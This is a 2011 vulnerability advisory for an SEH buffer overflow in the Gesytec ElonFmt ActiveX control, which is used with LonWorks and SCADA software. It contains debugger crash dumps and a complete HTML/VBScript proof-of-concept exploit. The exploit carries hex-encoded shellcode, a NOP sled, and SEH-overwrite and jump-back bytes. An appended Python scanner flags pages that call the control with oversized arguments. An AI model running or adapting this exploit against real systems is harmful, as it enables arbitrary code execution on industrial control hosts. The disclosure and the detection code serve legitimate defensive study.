<!--

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

Vendor: Gesytec GmbH
Product web page: http://www.gesytec.de
Affected version: 1.1.14.1

Summary: Connects LonWorks networks to process control, visualization, SCADA and office software.

Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is passed as the pid item of the GetItem1 function in the elonfmt.ocx module, several registers are overwritten, including the SEH handler. The input undergoes a character translation before it reaches the buffer (pairs of input characters show up as single bytes in the dumps below). An attacker can gain access to the affected node and execute arbitrary code.

----------------------------------------------------------------------------------

(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
cccccccc ??              ???

0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb

0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc      mov     ebx,0CCBBBBBBh
0013ecf5 cc              int     3
0013ecf6 cc              int     3
0013ecf7 cc              int     3
0013ecf8 dddd            fstp    st(5)
0013ecfa dddd            fstp    st(5)
0013ecfc dddd            fstp    st(5)
0013ecfe dddd            fstp    st(5)
...
...
...

0:000> d esp
0013eb58  01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00  .....aS.|Zc.....
0013eb68  88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf  ........$FS.....
0013eb78  a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89  .Zc..Zc.....`)S.
0013eb88  ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00  ....h...........
0013eb98  06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e  ..........st..C~
0013eba8  01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77  ........@.G....w
0013ebb8  1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00  .....V..........
0013ebc8  20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00   .c...c....w....

0:000> d
0013ebd8  64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c  d!.w....t..|Q|.|
0013ebe8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ebf8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec08  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec18  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec28  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec38  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec48  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
...
...
...

0:000> d
0013ece8  aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc  ................
0013ecf8  dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01  ..............c.
0013ed08  00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00  ......c.........
0013ed18  82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00  ..........c.(...
0013ed28  00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73  ......c......C.s
0013ed38  5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10  \...............
0013ed48  80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01  ..c.$.V.....x.c.
0013ed58  48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00  H...............

----------------------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Easylon OPC Server M 2.30.66.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

High five to sickn3ss!

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

09.04.2011

JUST A PoC MODEL:

-->

<html>
<object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' />
<script language='VBScript'>
targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype  = "Function GetItem1 ( ByVal typeName As String ,ByVal pid As String ,ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid     = "ELONFMTLib.ElonFmt"
argCount   = 3

arg1 = "defaultV"
arg2 = String(10, "90") _
     + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
     + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
     + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
     + "bdb04a0c921272dfe753b33d07016c4abab6190e" _
     + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
     + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
     + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
     + "a072b7353756c341bc5904c0867d80895d1f9177" _
     + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
     + "687cfa0bef8129681fc870d88895e059d525df9d" _
     + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
     + "7edcd8" _
     + String(62, "A") + "eb069090" + "78c70110" _
     + "e9e0fdffff" + String(20, "D")
arg3 = 1

zsl.GetItem1 arg1 ,arg2 ,arg3

'
'Argument No.2 Structure:
'--------------------------------------------------------------------------------------------------------------
'
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'
'--------------------------------------------------------------------------------------------------------------
'
'
'
'Scenes (2/5)
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'                junk          nseh        seh(eip)     pad          eip
'
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'                junk          nseh        seh(eip)        random
'
'--------------------------------------------------------------------------------------------------------------
'
</script>
</html>
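A detection-side example, added here and not part of the advisory or the vendor's code: a scanner that flags HTML pages which instantiate the ElonFmt CLSID from the PoC and call GetItem1 with an argument whose estimated length reaches the overflow range. The sample page it runs over is constructed from the advisory's crash layout (filler only); the SUSPICIOUS_LEN threshold, the regular expressions and the simplified VBScript expression model are assumptions.

```python
import re
# CLSID of the Gesytec ElonFmt control, copied from the advisory's <object> tag
ELONFMT_CLSID = "824C4DC5-8DA4-11D6-A01F-00E098177CDC"
SUSPICIOUS_LEN = 512  # assumed threshold; the advisory's crash layouts use 528 filler bytes
_OBJECT_RE = re.compile(r"<object[^>]*classid\s*=\s*['\"]clsid:([0-9a-f-]+)['\"]", re.I)
_ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
_CALL_RE = re.compile(r"\b(\w+)\.GetItem1\s+([^\n']+)", re.I)
_STRING_FN_RE = re.compile(r'String\(\s*(\d+)\s*,\s*"([^"]*)"\s*\)', re.I)

def _join_continuations(script):
    """VBScript joins a line that ends in ' _' with the following line."""
    return re.sub(r"[ \t]*_[ \t]*\r?\n\s*", " ", script)

def vbs_string_length(expr, assignments, depth=0):
    """Estimate the length of a VBScript string expression built from literals, String(n, c),
    variables and + / & concatenation. String(n, "90") yields n copies of '9', so only n counts."""
    if depth > 8:  # guard against self-referential assignments
        return 0
    total = 0
    for part in re.split(r"\s*[+&]\s*", expr.strip()):
        m = _STRING_FN_RE.fullmatch(part)
        if m:
            total += int(m.group(1)) if m.group(2) else 0
        elif len(part) >= 2 and part[0] == part[-1] == '"':
            total += len(part) - 2
        elif part in assignments:
            total += vbs_string_length(assignments[part], assignments, depth + 1)
    return total

def scan_html(html):
    """Return [(object_var, [estimated length per argument])] for each GetItem1
    call on the ElonFmt control whose longest argument reaches SUSPICIOUS_LEN."""
    if ELONFMT_CLSID not in {c.upper() for c in _OBJECT_RE.findall(html)}:
        return []
    script = _join_continuations(html)
    assignments = dict(_ASSIGN_RE.findall(script))
    findings = []
    for obj, arglist in _CALL_RE.findall(script):
        lengths = [vbs_string_length(a, assignments) for a in arglist.split(",")]
        if max(lengths) >= SUSPICIOUS_LEN:
            findings.append((obj, lengths))
    return findings

# Constructed sample modelled on the advisory's crash layout (filler only, no shellcode)
SAMPLE_HTML = """<object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' />
<script language='VBScript'>
arg1 = "defaultV"
arg2 = String(528, "A") + "BBBBBBBB" _
     + "CCCCCCCC" + String(101, "D")
arg3 = 1
zsl.GetItem1 arg1 ,arg2 ,arg3
</script>"""
```

Running scan_html(SAMPLE_HTML) reports the zsl object with argument lengths [8, 645, 0]; a page with the same CLSID but short arguments, or a page without this CLSID, yields no findings.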